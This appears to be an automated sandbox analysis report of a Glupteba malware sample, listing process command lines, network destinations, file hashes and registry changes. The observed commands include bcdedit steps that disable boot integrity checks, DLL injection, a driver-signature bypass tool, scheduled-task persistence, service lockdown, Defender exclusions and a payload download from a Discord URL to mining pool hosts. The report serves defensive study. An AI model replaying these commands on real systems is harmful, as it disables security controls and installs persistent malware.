C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-600186781-696915314161643401-1465218360-293719074-1100429955651495922-203760398"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30b8b5d5-c0a5-45d6-bce1-80bb6ace5c34.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | server14.localstats.org | udp |
| US | 8.8.8.8:53 | stun.stunprotocol.org | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| N/A | 127.0.0.1:3478 | | udp |
| US | 8.8.8.8:53 | stun3.l.google.com | udp |
| US | 74.125.250.129:19302 | stun3.l.google.com | udp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | | tcp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | | tcp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | trythisgid.com | udp |
| CZ | 46.8.8.100:443 | trythisgid.com | tcp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| US | 8.8.8.8:53 | ww82.trythisgid.com | udp |
| US | 199.59.243.225:80 | ww82.trythisgid.com | tcp |
Files
\Windows\rss\csrss.exe
| MD5 | 389bd8b7641c77c295ac8e270feb2913 |
| SHA1 | 3c4bd39414f24c0ece254d77122ca5a1bdfbca0f |
| SHA256 | a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39 |
| SHA512 | bc3f1428ef5ebe0f8d3da2f0dbb1f94a11ebcbb5495eee878b6ef05c30bca1513058fc69100954f6c752243e947b12faebc8bfe9adb378ca620cb01cacb5674e |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\Cab3F53.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar4054.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 713674d5e968cbe2102394be0b2bae6f |
| SHA1 | 90ac9bd8e61b2815feb3599494883526665cb81e |
| SHA256 | f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057 |
| SHA512 | e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb |
\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 1bf850b4d9587c1017a75a47680584c4 |
| SHA1 | 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19 |
| SHA256 | ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955 |
| SHA512 | ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 23:20
Reported
2024-05-09 23:25
Platform
win10-20240404-en
Max time kernel
300s
Max time network
299s
Command Line
Signatures
Glupteba
Glupteba payload
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | N/A |
UPX packed file
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
